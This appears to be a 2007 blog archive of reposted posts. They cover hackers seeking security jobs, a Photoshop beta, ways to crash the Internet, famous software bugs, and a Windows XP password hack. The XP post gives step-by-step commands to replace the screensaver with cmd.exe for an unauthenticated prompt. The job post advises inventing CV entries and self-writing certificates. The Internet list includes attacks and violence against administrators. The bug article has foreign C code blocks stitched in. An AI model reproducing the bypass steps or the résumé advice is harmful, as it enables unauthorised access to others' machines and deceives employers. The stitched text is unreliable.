Wednesday, January 17, 2007

hacking 4 a job

Young hackers usually dream about becoming a well-known security expert,
whose job is about executing high profile penetration tests on Fortune
100 companies. Why? Cool and interesting projects, bleeding-edge hardware
and software to work with, new areas to learn and gain knowledge, earning
money, creating (another) high profile - this time with the real name -
most hackers dream of that - few actually achieve it.

This article is meant to change this.

It is mostly about the pitfalls a hacker has to overcome, especially when
a company doesn't like "evil" hackers for the job. Therefore a sound and
seemingly logical explanation of where he got this security knowledge is
very important. Some people might say "hey, nice article, but it is not
really about hacking" - well, I say it is. It is about hacking corporate
minds. You want to achieve your goal - working for that Fortune 10 bank as
an IT security expert, but f*ck, they don't like hackers. Hackers are evil,
criminals, they say. So you have to hack their brains to get what you want!

First, it should be clear what a "security job" - or being a whitehat - is
about. The world, work and views are different. The section
"Hacker World vs. Security World" describes this.

Then you might need additional knowledge to impress your hopefully new
employer - the ways to get it are pretty clear, and you can find some hints
in "Getting a Background".

After you know what will await you, you actually have to apply for a job.
There are some do's and some don'ts you should keep in mind for writing
your application documents and when you've got your job interview. The
sections "Truthful or not", "How to find a job", "Getting your CV right"
and "The Job Interview" will keep you on the right track.

And finally: "Things you should not do after getting the job". This might
be more important than you think.

One last thing you should keep in mind when reading this text: it is
especially meant for people who have a hard time getting employed because
the company they are interested in has got a "no-hacker" policy, or the
country they are living in does not see hackers as an enrichment to the
security business. If you are trying to get into a company which welcomes
hackers with open arms - which is rarely the case - this text can still be
important to you.

About me: as a former hacker and phreaker, I have been working in the
security field for 7 years now and had to struggle several times with this
topic. I have also helped several friends and peers to their security jobs
so far. The content here is my own vast ;-) experience - with input from
friends and colleagues.

Enjoy.



----| Hacker World vs. Security World

What is the hacker's view of the world? Wardialing modems, attacking web
servers, writing exploits, driving around in the city to find vulnerable
wavelan networks, exploring bleeding edge hardware, programming a new tool
for weeks until it is perfect, meeting with hacker friends for weekend
sessions and drinking Jolt - well, and having a good time.
Is a security job like that? Well, of course not - but what is it actually
about?
In the security field, there are different positions.
a) The Programmer - he deals with programming operating systems or
applications. The job might be just that of a programmer (e.g.
programmer for the Sun Solaris kernel), or a development of security
components (e.g. part of the development team of Checkpoint's
Firewall-1), or part of the security audit team of a software package
(e.g. AIX security team from IBM in Austin/Texas).
b) The Administrator - he is responsible for running special equipment or
whole infrastructures. An administrator can be responsible for
all servers of a special operating system (e.g. Windows admin), the
network (LAN/WAN admin), applications (SAP, Oracle, Lotus Notes, etc.),
firewalls, etc.
The smaller the company, the broader and more general is usually the
scope of work for an administrator.
c) The Operator - sitting in front of a monitor (or several) all day and
evaluating output of logs and system messages. Boring. But usually you
get a good overall salary through additional holiday, weekend bonus
etc. Hackers rarely do that - but it's an option.
d) The Security Officer - he writes the security policies and
procedures for the company. If a security incident happens, he
has to decide what to do. Usually, he also takes part in defining
security and access roles for important. A very important job, but
that of a paper tiger - attending many boring meetings and
eventually reviewing some audit files.
e) The IT Auditor - an independent organ within the organization which
ensures the adequacy of IT controls. A job where you do not make many
friends, but usually can travel around the world, if you are working
for a big company. Most audit work is about organisational procedures
and whether they are followed, interviews and reviewing logs. However in
some positions, you can also do things like penetration tests - but even
if that's the case, it's just a small part of the job description.
An IT auditor usually cannot build up deep knowledge, but gets a
very broad knowledge and a very good overview of the company.
f) The Consultant - he works for a consultant company (whew!). From a
hacker's point of view, there are 3 types: general consultant
companies (e.g. McKinsey, KPMG, Ernst & Young), IT consultant
companies (e.g. IBM Consulting, Accenture) or IT security companies
(e.g. @stake, secunet, etc.). What is the difference? Well,
specialization of the company and size of the company.
It should be noted that most big audit companies (e.g. PWC, KPMG,
etc.) also have got IT security auditors, which do a mix of e) and f).
g) The "Hacker" - employed by the company to check the security of
networks, review source code, etc. In some companies, they are hired to
show to customers or press they employ cool people (hi to Ken William
;-) This job type is actually very rare ...

In some companies - especially security consultant companies who also
develop software - some people can actually be both programmer and
consultant. This is the case for @stake, Razor, eEye, etc. - but of course
even there just for some special guys.

Now that you have got a picture of what type of work there is to do, how
is the work done? What is the view on the work?

1) A hacker's "job" is actually very easy - viewed from a whitehat's side.
"They try to break into some company, and if they find a hole - great, if
not - well they try another company. They only have to find one hole,
that's enough." Although this is exaggerated, there is much truth in it, if
you see it as a game between "black" and "white".
A "whitehat" has to find all holes, and close them. That's a completely
different view - and many will say more challenging as well.
2) When you change sides - you also have to change your work habits.
You will normally get a description of what your scope of work is - and
that's what your job is about. You can't just do what you think would
be fun to do. Doing a fast penetration test on your company's mail
server? Might bring you to jail if you were not authorized.
Every job brings limits with it - and if you want to keep yours, you
have to follow them.
3) Then you have to follow procedures (e.g. the company's security
policies, working hours, dress code). In some companies these are very
strict, in others it's very relaxed.
4) You can not just work how you want to. If you are a database
administrator or you got a job in a security consultant company to do
penetration tests: you must either follow a methodology how you have to
do your work - to ensure the quality, or you have got to document
everything you did - if someone else has to pick-up your work later, he
knows what you did and why.
5) A security job does not mean that you can implement all security you
want. Everything will be focused on business needs. Want to install new
firewalls, tighten down the filter lists in the firewall, install a new
reverse proxy for the eCommerce system? Your boss will ask you why this
is needed, what the cost will be, and the impact. The new firewall might
add security, but be too expensive. Or the tightened filter lists would
make administration, content updates etc. more difficult. Or the reverse
proxy might downgrade performance, which would frustrate customers.
6) Ever heard about the famous "soft skills"? Yeah, you might be
technically an expert, but within a company, you are not alone, and you
don't act and work alone. This is why good communication skills (being
friendly, helpful, open, respectful, truthful etc. blabla) are very
important. In fact you should even consider this for your private life
anyway - it enhances your friendship with hackers (and girls as well!
;-) ...

So why go corporate anyway? It doesn't sound like fun. Well - it can be
fun. It depends on the company's culture and how much freedom you get.
And the work can be very rewarding: what you can learn, expanding your
knowledge, the environments and companies you see, and working
professionally for the first time in your life.

So brighten up - it can be fun and rewarding. Just remember: corporate
life is not a piece of cake and not to be taken too lightly. You'll have
to adapt.



----| Getting a Background

Now that you know what corporate life is about, you can qualify yourself
better if you've got security background - not hacker background - already.
Helpful are e.g. Cisco configuration know-how, Solaris/AIX/Win2k
administrator know-how, knowledge about security policies, hands-on
experience with firewall setups and server hardening, programming skills,
etc.
What skills are especially helpful for the job you would like to do?
Take a look at the job descriptions from the previous section and then
imagine what kind of knowledge is needed.
Then try to acquire that knowledge somehow. E.g. buy books, read online
articles about the topics, buy some old and cheap Cisco/Sun/RS6000/etc.
hardware and get some experience.
www.securityfocus.com is a good starting point for finding related
articles and books, ebay.com is a good place to find hardware, etc.

However the best is to get an internship or part-time job at an ISP or
security division of a big company.



----| Truthful or not?

There are companies out there which have got a "no hacker" policy.
There are countries where it is common thinking that hackers do "hacking"
and are therefore not suitable for "security" jobs - for ethical,
philosophical or technical reasons.
If you think that a company has got a "no hacker" policy - don't tell them.
If you don't know if they have got such a policy - don't tell them either.
You can still do that later if you get the strong feeling in the interview
they think positively about hackers. Otherwise: don't.



----| How to find a job

For some people it's easy: the job offers are made to them. For this you've
got to become famous or well-known in the security/hacker community. Good
examples for this are the l0pht team or ADM, or single individuals like
rain forest puppy and Fyodor.
If the job doesn't come to you, you have to look for a job yourself. There
are three ways:
1) Go to security conferences (or hacker conferences) - Usenix
Security Symposium and Blackhat Briefings are usually very good for
this, hold a good presentation, talk to some people ... and there you
are.
2) You search for security jobs on Internet job search engines (keywords
like "firewall", "security" even maybe "hacker" will bring you further),
additionally www.securityfocus.com has got the SecurityJobs mailing
list (and archive).
3) You directly send your resume to the companies you want to work for.
This is actually very effective. Job ads on the Internet, in computer
magazines or newspapers are expensive and usually don't bring many
results for the companies as the market for security specialists is
empty most of the time. So if you just send the IT security departments
your resume - you will get at least a job interview 90% of the time.

Or if you know someone within a company, he might propose you as a new
team member :-) that would be the easiest way ...



----| Getting your CV right

CV stands for Curriculum Vitae and means resume or application documents.
Before you start writing yours, get on the internet and read tips about
writing one.
Specifically for hackers going corporate, you should take care of the
following:
1) Your CV should contain no holes. If you spent 3 months burping and
farting in your room, put in your CV:
"January 2000 - March 2000: private software development project on
secure web applications. I experimented with various blabla, and
developed blablabla which enhanced security blabla ..."
I guess you get the picture.
2) Whatever you did - high school, internship, university, part-time jobs -
present everything in the light of what you did there in the security
field - and a bit more ... e.g. if you administrated a webserver for an
ISP as a part-time job, you write:
"I was responsible for the security of the webserver, had to review
the system and apache log files, review the source code of the CGIs,
blablabla"
3) If you did internships, part-time jobs or security related courses at
high school or university (even about cryptography and system
management) try to get an internship certificate, signed resume,
whatever. Try to influence the contents so it focuses on security.
In many companies you usually write them yourself and have them signed by
the boss - this is the easiest way of course.



----| The Job Interview

Show that you are ethical - give them the feeling that you would never
ever hack the company - without proper authorization by management. If
they think you are a shady character, no way they will hire you. Even if
they think positively about hackers.

Don't tell them you are a hacker, unless you really get the feeling during
the interview that this would help you!

If the company has got a "no hacker" policy, you'll have to face questions
like "Are you a hacker", "have you been a hacker before", "could you get
into the system you once administrated?", etc. Sometimes even challenging
you like "Are you skilled enough to still get into the firewall at the
university you built up?".
If you don't want to lie (like me), you can answer them like: "What do you
mean by 'if I am a hacker', if you mean 'someone who is vandalizing web
pages' - no, never, if you mean 'someone curious about security and
paranoid enough to tighten down everything and programming until 4 o'clock
in the morning' - yes, then I'm a hacker".

If you don't want to appear like a hacker - don't dress like one. Dress
like the company expects the proper person to dress. This might be a
business suit or casual. If in doubt: business suit, especially if it's a
consultant/auditor job.

And of course the usual tips for job interviews apply here as well. Buy a
book about that or read them on the internet.



----| Things you should not do after getting the job

Remember the following things:

Do NOT hack the company you are working for! If you are working for an
external audit or consultancy company, this includes your customers!
Do NOT hack other companies from the company you are working for or its
customers!
NEVER tell anyone from the hacker scene about the security (or insecurity)
of your company (and customers)!
NEVER tell your company (or your customers) secrets from the hacker scene -
otherwise you'll not have many friends anymore ...
It might not be wise to tell people in the company, that you are (or have
been) a hacker. People usually can't keep their mouths shut.
It is wise not to do any illegal things after becoming corporate - if you
are caught hacking into some systems - do you think your company will
believe that you never hacked them .... ?! So better become a greyhat, and
have fun researching and still do the same stuff like before. But either
authorized or passive watching ...



----| Closing Remarks

Several companies which fear hackers will think after reading this -
"f*ck, we have to tighten the "new employee" process".
But I will tell you something: Too late ... we are already everywhere.
There are former hackers in all major consultant, audit and software
development companies, banks and IT security companies. And guess what?
The world is not crumbling down in despair. Most hackers have ethics.
You might not like their ethical code, but most of them have a code of
honour, and would never hack the company they are working for.
You might say - "but the others, not all are good" - yes, that's true,
but so is the rest of the world - the same is true about people who are not
hackers. If you fight us you will lose - valuable team-members, with
strong skills and experiences. Think about it.

Thursday, January 4, 2007

photoshop new version

In the early hours of Friday, Dec. 15, a public beta of Photoshop Creative Suite 3 will be made available for download on Adobe Labs, the developer website used to showcase emerging technologies and beta software.
This new Photoshop release is the first version to run natively on Intel-based Apple Macintosh computers. Many creative professionals working in art, photography and video favor the Macintosh platform. However, the performance of Adobe's flagship product has suffered since Apple made the switch from PowerPC processors to Intel processors earlier this year.
In addition to its availability as a universal binary application for Mac OS X, the beta release will be compatible with both Microsoft Windows XP and Windows Vista operating systems.
"This is an exciting time for the Mac, and Adobe wanted to ease the move to new Intel-based systems with a preview release of Photoshop CS3," said John Loiacono, senior vice president of the creative solutions business unit at Adobe in a statement to the press.
Photoshop is one of the most widely used digital-imaging software applications in the world, and its release is being eagerly awaited by creative professionals working in the web- and print-publishing industries. The new version of the software will feature significant enhancements of Photoshop's user interface and functionality.
The public beta of Photoshop, a first for the application, will be made available for download free of charge. A valid registration and serial number from Photoshop CS2, Adobe Creative Suite 2, Adobe Creative Suite Production Studio, Adobe Design Bundle, Adobe Web Bundle or Adobe Video Bundle will be required to activate the program.
By releasing a beta version of the next Photoshop early, Adobe hopes to gather feedback before the product's official launch next year.
Friday's beta release will also include Adobe Bridge, a file-management application for Creative Suite, and Device Central, a cell phone and handheld emulator that allows developers to test interactive applications for mobile devices.
Photoshop is just one program in Adobe's family of productivity tools, Creative Suite. The next version of Creative Suite -- named Creative Suite 3 -- is expected to be released in spring 2007. Adobe has not announced any future plans to release other CS3 applications as beta software.
Creative Suite 3 will feature a range of digital-imaging, desktop-publishing, web-publishing, audio and video tools in several different bundles. Pricing information for CS3 is unknown at this time.
In the past, when Adobe has released public trial versions of its software the company has not provided technical support by telephone or e-mail. Support for the beta of Photoshop CS3 will be available through community forums on the Adobe Labs website.

ways 2 break net

On 17 July 1997, the Internet received a critical warning about its future, but that day and its lessons are already fading from memory. On that day, two blunders conspired to shut down the Internet for millions of users.
Early that morning, a system operator accidentally uploaded a corrupt database to the Internet's root domain servers. Until the problem was corrected, it was impossible to send email or access the Web within the .com and .net domains. The Internet was suddenly numeric, like the phone system. Forget about contacting http://www.hotwired.com - anybody trying to get to Synapse couldn't, unless they knew the numeric address of one of HotWired's servers.
The second snafu was more localized, but more severe for those affected. On that same Thursday morning, a construction crew in Virginia inadvertently sliced through a fiber-optic cable belonging to WorldCom and leased to Sprint. Many of Sprint's Internet customers in the mid-Atlantic states and New England couldn't get on the Net at all.
As someone affected by both outages, I spent most of the morning trying to figure out who to blame - and how to get my system operational again. But there was nothing I could do but wait.
The myth persists that the Net was built to withstand the blast of an atomic bomb. But that was the military-run Arpanet of the 1970s, not the corporate-run Internet of today. "What's basically wrong is we are centralized," explains Dr. Peter Salus, Internet historian and author of Casting the Net. "We have violated the constraints that the Department of Defense had in 1967."
Indeed, one of the most significant results of commercializing the Internet has been to create more single points of failure, rather than a more redundant and reliable network. That's because companies are busy finding ways to make themselves indispensable: User self-sufficiency is incompatible with sustained corporate profits.
In December 1995, Internet pioneer Bob Metcalfe predicted a global Internet meltdown. Since then, he has eaten his words. Nevertheless, real problems with the Internet remain. What's more, it's increasingly likely that these lurking problems will be deliberately exploited or tickled by accident, and result in another global Internet collapse.
How might it be done? The following 50 ways to crash the Net are based on conversations I had with Gene Spafford at Purdue University, Alan Wexelblat at the MIT Media Lab, Eugene Kashpureff at AlterNIC, and Fred Cohen at Sandia Laboratory's Computer Security Group. Most of these attacks work by targeting a single point of failure within today's Internet. Others rely on creating storms of activity that overwhelm legitimate network traffic.
(Please note: Neither I nor HotWired suggest that you actually attempt any of these means of sabotaging the Internet, nor do we condone any such attempts; we merely offer these as frightening - and funny - examples of how vulnerable the information infrastructure we rely on really is.)
Domain name system attacks
DNS is at once vital to today's Internet and poorly designed. Crash it, and you leave the Internet in shambles.
1. Disrupt the domain name system by uploading a bogus database to the root domain servers. (Network Solutions already demonstrated this one.)
2. Flood prominent nameservers with requests from all over the Internet.
3. Mount host attacks against the machines on which the name servers are running.
4. Find a bug in the DNS server that makes the program crash when provided with bogus input. (This happens about once a week at my ISP for no apparent reason, so there definitely is a bug.) Exploit continuously.
5. Find a bug in the Microsoft Windows 95 DNS client that causes the computer to format its hard drive when resolving a particular URL. Publish that URL.
6. Falsify the DNS entries for a major WWW server, like AltaVista, so that people trying to reach these machines are redirected to the DNS port on the root servers. Ouch!
7. Buy 10 backhoes.
Router attacks
The diversity of the early Internet is long gone. These days, 80 to 90 percent of the computers that run the Net are routers manufactured by Cisco Systems. This makes them especially vulnerable to common flaws.
8. Find a key bug in Cisco's operating system and exploit it.
9. Get a job at Cisco and plant your own vulnerability in the operating system.
10. Convince 50,000 people to ping key backbone routers, resulting in CPU overload.
11. Capture administrative passwords used to access key Internet backbone routers. Break in and change configurations, then change the passwords.
12. Alter each backbone ISP's master router configuration files so that next time the routers are updated, they crash.
13. Block legitimate administrative access to the machines.
14. Insert forged routes into Internet routing tables to take key machines off the Internet.
15. Announce on the Internet's routing tables that your router is absolutely the best router to get to Mae East.
16. Get physical access to key routers in out-of-the-way locations and unplug them.
17. Don't bother with the routers, just unplug the air conditioners.
Critical host attacks
A small number of computers on the Internet are accessed by a tremendous number of people. Attacking these machines can make the Internet unusable for millions of users.
18. Find the administrators of key machines and personally threaten them so they don't come to work. Alternatively, shoot them.
19. Call the phone company and tell them the leased lines connecting key computers are no longer needed. "We're having a new T3 installed from UUNET." Once leased lines are disconnected - even by accident - it can take weeks to get them re-established.
20. Steal the VeriSign master key and issue fraudulent certificates.
21. Flood VeriSign's certificate revocation server with requests. Result: ActiveX applets won't load.
22. Instead of actually breaking into one of these machines, just make it appear that way. Frenzied sysadmins are sure to make catastrophic mistakes.
IP attacks
Internet enthusiasts love to boast about the power of Internet protocol, but in fact ICMP packets have no authentication, which opens up a number of interesting opportunities for exploitation.
23. Send fake ICMP Redirect messages to major sites, causing those sites to send their packets to the wrong destinations. The packets will eventually get to the correct location, but not without causing needless congestion.
24. Send ICMP Quench messages. These tell the major hosts to send out their packets more slowly.
25. Send forged ICMP Host Unreachable messages to a few key machines, telling them that machines with which they must communicate are unreachable.
26. Send ICMP or UDP Echo-virus packets to well-known hosts. Then sit back and watch them tie themselves in knots.
End-user-based attacks
The major limitation of the attacks listed above is their single point of origin. A more effective approach is to trick unsuspecting Internet users into doing your bidding.
27. Run a contest with a US$10,000 reward that goes to the person who stays connected to your Web site for the longest period of time.
28. As part of the contest, give extra credit to users who run a downloadable Web spider and continuously send you the results.
29. Distribute a hostile computer program on your Web page that reads through a person's email address book and sends a copy of itself to each person listed therein.
30. Distribute a hostile applet that disconnects users' modems and calls the unpublished technical-support number of a major Internet backbone provider.
31. Draw people to your Web page by loading bogus DNS entries for popular machines, like home.netscape.com or www.microsoft.com, into prominent nameservers, so that people trying to go to these machines are sent to your Web server. (That's what AlterNIC did to steal www.internic.net.)
32. Distribute easy-to-use mail spamming programs for free.
End-user attacks
Instead of having end users attack the Internet, attack the end users themselves. The resulting calls for help will swamp tech-support lines.
33. Have a hostile program upload bogus firmware to users' modems. Once the modems crash, there is no way to download a fresh copy of the firmware.
34. Have the hostile applet erase the computer's ROM BIOS. (Most new computers have their ROM BIOS stored in EEPROM.)
35. Once the hostile program finishes executing, have it encrypt the user's hard drive and print a ransom note claiming that the attack came from the user's ISP.
36. Alternately, don't bother attacking the user's machine - just send out spam mail that appears to come from the user's ISP and asks them to call tech support right away.
Social-engineering attacks
Not all attacks need to be technical. Here are some attacks aimed at the Internet's social fabric. These may not crash the Net so much as strangle it to death.
37. Get Congress to pass CDA 2.0.
38. Convince a major Internet service provider not to carry its competitors' packets unless they pay for the right.
39. Convince a few key senators that the Internet is a US resource that should be exploited for the national good.
40. Convince the National Science Foundation that the Internet is an NSF resource that should be exploited to fund science research.
41. Establish an Internet governance organization that claims to represent all netizens.
42. Establish a second organization that represents all ISPs.
43. Encourage webmasters to unionize and strike.
44. Spam people with death threats to convince them that the Internet is unsafe.
45. Hack Wall Street's computers and set the price of Cisco stock to $1.50.
Insanely huge attacks
When I called up Fred Cohen at Sandia Laboratory's Computer Security Group, I discovered that he has spent years thinking up ways to attack the Internet's infrastructure. Some of his favorites include:
46. Create cascade failures on the power grid. This would take out the Internet, and a lot more. Something like this happened in Cambridge, Massachusetts, when more than 200 businesses and hundreds of thousands of users up and down New England lost their Net connections after an explosion knocked out electrical power in large parts of Boston and the surrounding area.
47. Create a cascade failure in the phone system by modifying a few bits of code in a major telephone company's switching systems.
48. Do a nuclear test above the atmosphere. According to Cohen, a test conducted by the US military in the '50s "took out communications from New York through Sydney for several minutes" by disrupting the magnetic field of the earth.
49. Inject power to the earth's field lines at the north and south poles to disable large areas of electromagnetic communications (there is actually a patent on this technique).
In the overall scheme of things, taking out the Internet would certainly hurt. But we are not as dependent on the Internet now as we soon will be, when an Internet crash could delay a military deployment or create financial havoc. Today, says Cohen, if you want to destroy a country's infrastructure, you're better off going after its power stations than its Internet dial-ups.
But that's changing. The Internet is being used for more critical things - and it's a single network, rather than multiple, independent networks, which would have a better chance of withstanding serious attacks. Ten years from now, things could be much worse.
So what's the 50th way to crash the Internet? It's easy, really:
50. Wait until 1 January 2000.

software bugs

By Simson Garfinkel, 02:00 AM, Nov. 08, 2005
Last month automaker Toyota announced a recall of 160,000 of its Prius hybrid vehicles following reports of vehicle warning lights illuminating for no reason, and cars' gasoline engines stalling unexpectedly. But unlike the large-scale auto recalls of years past, the root of the Prius issue wasn't a hardware problem -- it was a programming error in the smart car's embedded code. The Prius had a software bug.
With that recall, the Prius joined the ranks of the buggy computer -- a club that began in 1945 when engineers found a moth in Panel F, Relay #70 of the Harvard Mark II system. The computer was running a test of its multiplier and adder when the engineers noticed something was wrong. The moth was trapped, removed and taped into the computer's logbook with the words: "first actual case of a bug being found."
Sixty years later, computer bugs are still with us, and show no sign of going extinct. As the line between software and hardware blurs, coding errors are increasingly playing tricks on our daily lives. Bugs don't just inhabit our operating systems and applications -- today they lurk within our cell phones and our pacemakers, our power plants and medical equipment. And now, in our cars.
But which are the worst?
It's all too easy to come up with a list of bugs that have wreaked havoc. It's harder to rate their severity. Which is worse -- a security vulnerability that's exploited by a computer worm to shut down the internet for a few days or a typo that triggers a day-long crash of the nation's phone system? The answer depends on whether you want to make a phone call or check your e-mail.
Many people believe the worst bugs are those that cause fatalities. To be sure, there haven't been many, but cases like the Therac-25 are widely seen as warnings against the widespread deployment of software in safety critical applications. Experts who study such systems, though, warn that even though the software might kill a few people, focusing on these fatalities risks inhibiting the migration of technology into areas where smarter processing is sorely needed. In the end, they say, the lack of software might kill more people than the inevitable bugs.
What seems certain is that bugs are here to stay. Here, in chronological order, is the Wired News list of the 10 worst software bugs of all time … so far.
July 28, 1962 -- Mariner I space probe. A bug in the flight software for the Mariner 1 causes the rocket to divert from its intended path on launch. Mission control destroys the rocket over the Atlantic Ocean. The investigation into the accident discovers that a formula written on paper in pencil was improperly transcribed into computer code, causing the computer to miscalculate the rocket's trajectory.
1982 -- Soviet gas pipeline. Operatives working for the Central Intelligence Agency allegedly plant a bug in a Canadian computer system purchased to control the trans-Siberian gas pipeline. The Soviets had obtained the system as part of a wide-ranging effort to covertly purchase or steal sensitive U.S. technology. The CIA reportedly found out about the program and decided to make it backfire with equipment that would pass Soviet inspection and then fail once in operation. The resulting event is reportedly the largest non-nuclear explosion in the planet's history.
1985-1987 -- Therac-25 medical accelerator. A radiation therapy device malfunctions and delivers lethal radiation doses at several medical facilities. Based upon a previous design, the Therac-25 was an "improved" therapy system that could deliver two different kinds of radiation: either a low-power electron beam (beta particles) or X-rays. The Therac-25's X-rays were generated by smashing high-power electrons into a metal target positioned between the electron gun and the patient. A second "improvement" was the replacement of the older Therac-20's electromechanical safety interlocks with software control, a decision made because software was perceived to be more reliable.
What engineers didn't know was that both the 20 and the 25 were built upon an operating system that had been kludged together by a programmer with no formal training. Because of a subtle bug called a "race condition," a quick-fingered typist could accidentally configure the Therac-25 so the electron beam would fire in high-power mode but with the metal X-ray target out of position. At least five patients die; others are seriously injured.
overflow in Berkeley Unix finger daemon. The first internet worm (the so-called Morris Worm) infects between 2,000 and 6,000 computers in less than a day by taking advantage of a buffer overflow. The specific code is a function in the standard input/output library routine called gets() designed to get a line of text over the network. Unfortunately, gets() has no provision to limit its input, and an overly large input allows the worm to take over any machine to which it can connect.
Programmers respond by attempting to stamp out the gets() function in working code, but they refuse to remove it from the C programming language's standard input/output library, where it remains to this day.
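The bounded alternative to the gets() call described above, as an added example (not code from the article or from Berkeley Unix). The function names, the status codes and the sample input are this example's own assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Result codes for read_line(); the names are this example's own. */
enum line_status { LINE_OK, LINE_TOO_LONG, LINE_EOF };

/*
 * Unbounded form, for comparison (buffer size constructed):
 *     char line[64];
 *     gets(line);        // no size argument, so input length is unbounded
 * read_line() is a bounded replacement: it never writes more than cap
 * bytes into buf and reports an oversized line instead of storing it.
 */
enum line_status read_line(FILE *in, char *buf, size_t cap)
{
    if (cap < 2 || fgets(buf, (int)cap, in) == NULL)
        return LINE_EOF;        /* nothing read: EOF, error, unusable buf */

    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';    /* complete line, strip the newline */
        return LINE_OK;
    }
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return LINE_OK;         /* line filled the buffer exactly */

    /* Longer than the buffer: drain the remainder so the next call starts
     * on a fresh line, and hand nothing of the oversized line back. */
    while ((c = fgetc(in)) != EOF && c != '\n')
        ;
    buf[0] = '\0';
    return LINE_TOO_LONG;
}

/* Run constructed input through read_line() and return the status of
 * line number `which` (0-based), leaving that line's text in out. */
enum line_status demo_line(const char *input, int which, char *out, size_t cap)
{
    FILE *f = tmpfile();
    enum line_status st = LINE_EOF;
    if (f == NULL)
        return LINE_EOF;
    fputs(input, f);
    rewind(f);
    for (int i = 0; i <= which; i++)
        st = read_line(f, out, cap);
    fclose(f);
    return st;
}
```

A caller that receives LINE_TOO_LONG should reject the request rather than process a truncated line.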
1988-1996 -- Kerberos Random Number Generator. The authors of the Kerberos security system neglect to properly "seed" the program's random number generator with a truly random seed. As a result, for eight years it is possible to trivially break into any computer that relies on Kerberos for authentication. It is unknown if this bug was ever actually exploited.
January 15, 1990 -- AT&T Network Outage. A bug in a new release of the software that controls AT&T's #4ESS long distance switches causes these mammoth computers to crash when they receive a specific message from one of their neighboring machines -- a message that the neighbors send out when they recover from a crash.
One day a switch in New York crashes and reboots, causing its neighboring switches to crash, then their neighbors' neighbors, and so on. Soon, 114 switches are crashing and rebooting every six seconds, leaving an estimated 60 thousand people without long distance service for nine hours. The fix: engineers load the previous software release.
1993 -- Intel Pentium floating point divide. A silicon error causes Intel's highly promoted Pentium chip to make mistakes when dividing floating-point numbers that occur within a specific range. For example, dividing 4195835.0/3145727.0 yields 1.33374 instead of 1.33382, an error of 0.006 percent. Although the bug affects few users, it becomes a public relations nightmare. With an estimated 3 million to 5 million defective chips in circulation, at first Intel only offers to replace Pentium chips for consumers who can prove that they need high accuracy; eventually the company relents and agrees to replace the chips for anyone who complains. The bug ultimately costs Intel $475 million.
1995/1996 -- The Ping of Death. A lack of sanity checks and error handling in the IP fragmentation reassembly code makes it possible to crash a wide variety of operating systems by sending a malformed "ping" packet from anywhere on the internet. Most obviously affected are computers running Windows, which lock up and display the so-called "blue screen of death" when they receive these packets. But the attack also affects many Macintosh and Unix systems as well.
June 4, 1996 -- Ariane 5 Flight 501. Working code for the Ariane 4 rocket is reused in the Ariane 5, but the Ariane 5's faster engines trigger a bug in an arithmetic routine inside the rocket's flight computer. The error is in the code that converts a 64-bit floating-point number to a 16-bit signed integer. The faster engines cause the 64-bit numbers to be larger in the Ariane 5 than in the Ariane 4, triggering an overflow condition that results in the flight computer crashing.
First Flight 501's backup computer crashes, followed 0.05 seconds later by a crash of the primary computer. As a result of these crashed computers, the rocket's primary processor overpowers the rocket's engines and causes the rocket to disintegrate 40 seconds after launch.
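A range-checked version of the 64-bit float to 16-bit signed integer conversion described above, as an added example in C (not the Ariane flight code). The function names and the two sample traces are constructed for illustration and are not flight data.

```c
#include <math.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Convert only when the value fits. In C an out-of-range double-to-integer
 * conversion is undefined behaviour, so the range test comes before the
 * cast. Returns false (leaving *out untouched) for NaN, infinities and any
 * value whose truncated result lies outside INT16_MIN..INT16_MAX.
 */
bool to_int16_checked(double v, int16_t *out)
{
    if (isnan(v) || v <= (double)INT16_MIN - 1.0 || v >= (double)INT16_MAX + 1.0)
        return false;
    *out = (int16_t)v;          /* truncates toward zero, known to fit */
    return true;
}

/* Alternative policy: clamp to the nearest representable value and report
 * through *clamped that the reading was out of range. */
int16_t to_int16_saturating(double v, bool *clamped)
{
    int16_t r;
    *clamped = !to_int16_checked(v, &r);
    if (!*clamped)
        return r;
    if (isnan(v))
        return 0;
    return v < 0 ? INT16_MIN : INT16_MAX;
}

/* Count how many readings in a trace cannot be stored in 16 bits. */
size_t count_out_of_range(const double *trace, size_t n)
{
    size_t bad = 0;
    int16_t tmp;
    for (size_t i = 0; i < n; i++)
        if (!to_int16_checked(trace[i], &tmp))
            bad++;
    return bad;
}

/* Constructed readings: the first stays inside the 16-bit range, the
 * second grows past it, as larger input values would. */
const double SLOW_TRACE[] = { 1200.5, 9800.0, 21000.25, 32767.9 };
const double FAST_TRACE[] = { 1200.5, 21000.25, 40960.0, 65536.5 };
```

Code reused under new operating conditions can be run against expected input ranges with a counter like count_out_of_range() before deployment.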
November 2000 -- National Cancer Institute, Panama City. In a series of accidents, therapy planning software created by Multidata Systems International, a U.S. firm, miscalculates the proper dosage of radiation for patients undergoing radiation therapy.
Multidata's software allows a radiation therapist to draw on a computer screen the placement of metal shields called "blocks" designed to protect healthy tissue from the radiation. But the software will only allow technicians to use four shielding blocks, and the Panamanian doctors wish to use five.
The doctors discover that they can trick the software by drawing all five blocks as a single large block with a hole in the middle. What the doctors don't realize is that the Multidata software gives different answers in this configuration depending on how the hole is drawn: draw it in one direction and the correct dose is calculated, draw in another direction and the software recommends twice the necessary exposure.
At least eight patients die, while another 20 receive overdoses likely to cause significant health problems. The physicians, who were legally required to double-check the computer's calculations by hand, are indicted for murder.

xp weakness

How to Hack a Windows XP Administrator Password
November 11th, 2006 - scribez
(Before you continue, read the Updates at the bottom.) This is only for educational purposes. It is a simple way to hack the Windows XP Administrator password and also get away with it. Not many steps are involved, especially if you already have a knowledge of working with the DOS prompt.
Here are the steps involved to hack the Windows XP Administrator password.
Go to Start –> Run –> Type in CMD
You will get a command prompt. Enter these commands exactly as given:
cd\
cd\ windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit
Wait, it's not over; read the rest to find out how to hack the Windows XP Administrator password.
A brief explanation of what you are doing here:
You are navigating to the Windows system directory, where the system files are stored. Next you are creating a temporary directory called temphack. Then you are copying (backing up) the logon.scr and cmd.exe files into temphack, deleting the logon.scr file and renaming the cmd.exe file to logon.scr.
So basically you are telling Windows to back up the command program and the screen saver file. Then we edited the settings so that when Windows loads the screen saver, we get an unprotected DOS prompt without logging in. When this appears, enter this command:
net user password
